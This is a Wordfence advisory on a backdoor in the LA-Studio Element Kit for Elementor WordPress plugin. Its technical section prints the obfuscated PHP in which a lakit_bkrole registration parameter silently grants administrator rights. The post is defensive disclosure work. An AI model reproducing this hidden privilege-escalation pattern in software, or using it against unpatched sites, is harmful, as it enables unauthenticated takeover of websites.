On January 12th, 2026, we received a submission for a Backdoor vulnerability in the LA-Studio Element Kit for Elementor, a WordPress plugin with more than 20,000+ active installations. This vulnerability makes it possible for an unauthenticated attacker to create malicious administrator users.
Props to Athiwat Tiprasaharn (Jitlada), Itthidej Aramsri (Boeing777) and Waris Damkham who discovered and responsibly reported this vulnerability through the Wordfence Bug Bounty Program. These researchers earned a bounty of $975.00 for this discovery. Our mission is to secure WordPress through defense in depth, which is why we are investing in quality vulnerability research and collaborating with researchers of this caliber through our Bug Bounty Program. We are committed to making the WordPress ecosystem more secure through the detection and prevention of vulnerabilities, which is a critical element to our multi-layered approach to security.
Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on January 13, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on February 12, 2026.
We provided full disclosure details to the LA-Studio team instantly through our Wordfence Vulnerability Management Portal on January 13, 2026. The vendor acknowledged the report and released the patch on January 14, 2026. We would like to commend the LA-Studio team for their prompt response and timely patch.
The vendor informed us, in response to our inquiry, that a former employee added the backdoor code to the plugin. The developer’s employment with the company ended at the end of December (and the last change to the backdoor was made that time, so it is likely that the employee modified the backdoor code shortly before their employment was terminated). This serves as an important reminder about insider threats, and ensuring proper controls and checks are in place for employee terminations and regular monitoring of team member activities.
We urge users to update their sites with the latest patched version of LA-Studio Element Kit for Elementor, version 1.6.0 at the time of this publication, as soon as possible.
📢 Did you know Wordfence runs a Bug Bounty Program for all WordPress plugin and themes at no cost to vendors? Researchers can earn up to $31,200 per vulnerability, for all in-scope vulnerabilities submitted to our Bug Bounty Program! Find a vulnerability, submit the details directly to us, and we handle all the rest.
Vulnerability Summary from Wordfence Intelligence
Technical Analysis
Examining the code reveals that the plugin uses the ajax_register_handle() function in the LaStudio_Kit_Integration class to handle user registration.
The function also contains obfuscated code that adds an administrator capability to the new user when the lakit_bkrole parameter is used in the registration request.
public function ajax_register_handle( $request ){
$return_data = [];
$is_human = $this->verify_recaptchav3( $request['lakit_recaptcha_response'] ?? '' );
$has_username = $request['lakit_field_log'] ?? 'no';
$has_pwd = $request['lakit_field_pwd'] ?? 'no';
$has_cpwd = $request['lakit_field_cpwd'] ?? 'no';
$username = $request['username'] ?? '';
$email = $request['email'] ?? '';
$password = $request['password'] ?? '';
$cpassword = $request['password-confirm'] ?? '';
$username = wp_slash($username);
$email = wp_slash($email);
$sys_meta_key = apply_filters('lastudio-kit/integration/sys_meta_key', 'insert_lakit_meta');
if(!empty($request['lakit_bkrole']) && !empty($sys_meta_key)){
add_filter( $sys_meta_key, [ $this, 'ajax_register_handle_backup' ], 20);
}
public function ajax_register_handle_backup($meta){
global $table_prefix;
$data = $table_prefix . LaStudio_Kit_Helper::capabilities();
return apply_filters('lastudio-kit/integration/user-meta', $meta, $data);
}
add_filter('lastudio-kit/integration/user-meta', function ( $value, $label){
if(class_exists('LaStudio_Kit_Helper')){
$k = substr_replace(LaStudio_Kit_Helper::lakit_active(), 'mini', 2, 0);
$value[ $label ] = [
$k => 1
];
}
return $value;
}, 10, 2);
public static function lakit_active(){
return 'adstrator';
}
What made this particularly interesting is that the functionality was visibly obfuscated, which appeared to be an attempt to evade detection. This is what led us to ask the vendor why this functionality was added at which point they informed us their previous developer left around the same time this code was added.
As with any Administrative User Creation vulnerability, this can be used for complete site compromise. Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modify posts and pages which can be leveraged to redirect site users to other malicious sites or inject spam content.
Disclosure Timeline
January 12, 2026 – We received the submission for the Backdoor vulnerability in LA-Studio Element Kit for Elementor via the Wordfence Bug Bounty Program.
January 13, 2026 – We validated the report and confirmed the proof-of-concept exploit.
January 13, 2026 – Full disclosure details were sent instantly to the vendor through our Wordfence Vulnerability Management Portal.
January 13, 2026 – Wordfence Premium, Care, and Response users received a firewall rule to provide added protection against any exploits that may target this vulnerability.
January 14, 2026 – The vendor acknowledged the report and began working on a fix.
January 14, 2026 – The fully patched version of the plugin, 1.6.0, was released.
February 12, 2026 – Wordfence Free users will receive the same protection.
Conclusion
In this blog post, we detailed a Backdoor vulnerability within the LA-Studio Element Kit for Elementor plugin affecting versions 1.5.6.3 and earlier. This vulnerability allows unauthenticated threat actors to create administrator accounts. The vulnerability has been addressed in version 1.6.0 of the plugin.
We encourage WordPress users to verify that their sites are updated to the latest patched version of LA-Studio Element Kit for Elementor as soon as possible considering the critical nature of this vulnerability.
Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on January 13, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on February 12, 2026.
If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.
The post 20,000 WordPress Sites Affected by Backdoor Vulnerability in LA-Studio Element Kit for Elementor WordPress Plugin appeared first on Wordfence.
